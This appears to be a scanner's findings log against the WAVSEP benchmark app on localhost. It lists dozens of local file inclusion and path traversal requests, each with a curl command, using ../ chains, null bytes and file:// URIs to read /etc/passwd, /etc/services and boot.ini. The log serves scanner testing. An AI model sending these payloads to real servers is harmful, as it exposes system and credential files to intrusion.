Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
